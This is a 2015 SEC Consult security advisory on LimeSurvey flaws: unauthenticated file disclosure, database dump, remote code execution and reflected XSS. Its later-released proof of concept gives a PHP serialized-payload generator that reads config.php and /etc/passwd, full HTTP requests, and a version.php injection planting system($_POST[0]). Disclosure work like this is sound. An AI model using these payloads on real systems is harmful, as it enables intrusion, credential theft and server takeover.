Multiple critical vulnerabilities in Lime Survey

SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >

=======================================================================

title: Multiple critical vulnerabilities

product: Lime Survey

vulnerable version: 2.05 up to 2.06+ Build 151014

fixed version: 2.06+ Build 151016

CVE number:

impact: critical

homepage: www.limesurvey.org

found: 2015-10-12

by: P. Morimoto (Office Bangkok)

SEC Consult Vulnerability Lab

 

An integrated part of SEC Consult

Berlin - Frankfurt/Main - Montreal - Singapore

Vienna (HQ) - Vilnius - Zurich - Bangkok

 

www.sec-consult.com

 

=======================================================================

 

Vendor description:

-------------------

Lime Survey allows users to quickly create intuitive, powerful,

online question-and-answer surveys that can work for tens to thousands

of participants without much effort. The survey software itself is

self-guiding for the respondents who are participating.

Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of

private persons, big companies, academic facilities and governmental

institutions around the world.

 

URL: www.limesurvey.org/en/about-limesurvey/references

 

 

Business recommendation:

------------------------

By combining the vulnerabilities documented in this advisory,

unauthenticated remote attackers can completely compromise Lime

Survey application server.

 

- Arbitrary local files can be downloaded

- Entire Lime Survey database can be accessed

- Arbitrary PHP code can be executed

 

SEC Consult recommends not to use this software until a thorough security

review has been performed by security professionals and all identified

issues have been resolved.

 

 

Vulnerability overview/description:

-----------------------------------

Due to the lack of function level access control many administrative

functions in Lime Survey can be accessed by remote attackers without

prior authentication.

 

Moreover, the application did not validate some of user input properly.

Unauthenticated attackers can pass specially crafted data to the entry points

result in following vulnerabilities.

 

1. Unauthenticated local file disclosure

An attacker can craft a malicious PHP serialized string containing a list of

arbitrary files. This list can be sent to the Lime Survey backup feature

for downloading without prior authentication.

 

Any files accessible with the privileges of the web server user

can be downloaded.

 

2. Unauthenticated database dump

An attacker can request the database backup feature without authentication.

The whole Lime Survey database can be downloaded including username and

hashed password of the administrator account.

 

3. Unauthenticated arbitrary remote code execution

An attacker can inject arbitrary PHP code into the application source code

allowing to plant a malicious web backdoor to access underlying web server.

 

4. Multiple reflective cross-site scripting

The application is prone to multiple reflective cross-site scripting

vulnerabilities.

 

 

Proof of concept:

-----------------

The vendor kindly asked SEC Consult to give people enough time to update

their installations.

 

Because of the high risk vulnerabilities, the proof of concept

section has been removed from this advisory.

 

Update 2016-09-29: Poc released, see below

 

1. Unauthenticated local file disclosure

First, generate list of files for PHP serialized payload.

$ cat limesurvey-lfi.php
<?php
$pwn = new stdClass; // dummy class
$pwn->file = '/application/config/config.php';
$pwn2 = new stdClass;
$pwn2->file = '/../../../../../../../../../etc/passwd';

echo base64_encode(serialize([$pwn, $pwn2])); // datasupdateinfo

 

Then submit the generated value as an unauthenticated request with datasupdateinfo parameter.

HTTP Request:

HTTP Request:
POST /index.php/admin/update/backup HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 264

YII_CSRF_TOKEN=x&destinationBuild=x&datasupdateinfo=YToyOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO31pOjE7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjM4OiIvLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fX0=

HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 12 Oct 2015 19:37:27 GMT
Set-Cookie: PHPSESSID=4fr25208e91ap3ith6beagg9l3; path=/; HttpOnly
[..deducted..]

<h2 class="maintitle">Creating file backup</h2>


<div class="updater-background">
    <p class="success " style="text-align: left;">
        <strong>File backup created: </strong>
        <br/>
        /var/www/limesurvey/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip<br/>
        <a class="btn btn-success" href="http://<host>/tmp/LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip" title="Download this file">Download this file</a>
[..deducted..]

$ unzip -l LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
Archive:  LimeSurvey_files_backup_2015-10-12_040d1150297f7ae0f46c338a80114a3c.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
     2345  10-12-15 13:33   application/config/config.php
     1148  10-12-15 13:22   ../../../../../../../../../etc/passwd
 --------                   -------
     3493                   2 files

 

2. Unauthenticated database dump

HTTP Request:

POST /index.php/admin/update/step3 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

YII_CSRF_TOKEN=x

HTTP Response:
HTTP/1.1 200 OK
[..deducted..]
    <div class="successtitle"> Creating database backup...</div>
    <p class="success">DB backup created: /var/www/limesurvey/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip</p>
[..deducted..]

 

Entire Lime Survey database is downloadable via

http:// <host>/tmp/LimeSurvey_database_backup_2015-10-16_00763f2a6579925ae1daf39239e7aa1b.zip

 

3. Unauthenticated arbitrary remote code execution

HTTP Request:

POST /index.php/admin/update/step4 HTTP/1.1
Host: <host>
[..deducted..]
Cookie: YII_CSRF_TOKEN=x;
Content-Type: application/x-www-form-urlencoded

YII_CSRF_TOKEN=x&destinationBuild=151014';system($_POST[0]);phpinfo();//&datasupdateinfo=YToxOntpOjA7Tzo4OiJzdGRDbGFzcyI6MTp7czo0OiJmaWxlIjtzOjMwOiIvYXBwbGljYXRpb24vY29uZmlnL2NvbmZpZy5waHAiO319&access_token=<ComfortUpdate_Token>

 

The comfort update server seems to do (int) "151014';system($_POST[0]);phpinfo();//&" => 151014 and return valid .zip update

but the local update write user input string $destinationBuild => "151014';system($_POST[0]);phpinfo();//&" into version.php

 

Next, just go to any page, for example, the homepage of Lime Survey.

The injected "phpinfo()" will be executed as the result of unauthenticated RCE exploit

due to the fact that "version.php" is automatically included on almost every pages.

 

4. Multiple reflective cross-site scripting

File: application/views/admin/update/_ajaxVariables.php:23:

File: application/views/admin/update/_ajaxVariables.php:30:

File: application/views/admin/update/_ajaxVariables.php:34: